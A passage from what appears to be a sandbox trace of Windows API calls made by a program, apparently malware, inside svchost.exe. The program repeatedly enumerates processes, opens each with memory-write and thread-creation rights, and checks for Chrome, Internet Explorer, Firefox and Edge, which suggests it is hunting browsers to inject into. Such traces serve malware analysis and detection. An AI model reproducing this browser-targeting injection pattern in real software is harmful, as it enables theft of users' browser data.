	[0237.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.497] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7b3c
	[0237.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.497] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.498] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.498] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.499] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7b40
	[0237.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.500] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.500] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.500] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.501] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.501] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7b44
	[0237.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.502] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.502] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.502] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.503] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.503] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.504] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7b48
	[0237.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.504] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.504] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.504] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.505] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.505] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7b4c
	[0237.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.506] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.506] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.507] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.507] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0237.508] CloseHandle (hObject=0x4fd0) returned 1
	[0237.508] Sleep (dwMilliseconds=0x64) 
	[0237.613] GetCurrentProcessId () returned 0x110
	[0237.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0237.618] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0237.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0237.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0237.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7b50
	[0237.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.623] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.623] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.623] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.623] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.624] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7b54
	[0237.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.624] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.625] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.625] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.625] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.626] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0237.626] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7b58
	[0237.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.626] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0237.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.627] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.627] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0237.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.627] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0237.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7b5c
	[0237.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.629] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0237.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.629] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.629] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0237.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.629] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0237.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7b60
	[0237.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.630] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0237.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.631] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.631] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0237.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.631] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.632] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0237.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7b64
	[0237.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.633] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0237.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.633] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.633] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0237.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.634] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0237.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7b68
	[0237.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.635] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0237.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.635] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.635] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0237.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.636] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.636] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0237.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7b6c
	[0237.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.637] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0237.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.637] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.637] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0237.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.638] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.638] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.639] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7b70
	[0237.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.639] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.639] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.640] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.640] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7b74
	[0237.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.642] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.642] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.643] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.643] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.643] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7b78
	[0237.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.644] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.644] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.645] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.645] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.645] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7b7c
	[0237.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.646] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.646] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.647] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.647] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7b80
	[0237.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.648] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.648] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.649] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.649] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7b84
	[0237.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.650] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.650] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.651] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.653] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7b88
	[0237.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.654] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.655] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.655] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.655] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.656] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0237.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7b8c
	[0237.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.657] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0237.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.657] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.657] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0237.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.658] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.658] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7b90
	[0237.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.659] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.659] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.659] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.660] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.660] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0237.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7b94
	[0237.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.661] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.661] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.661] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.662] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.662] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7b98
	[0237.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.663] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
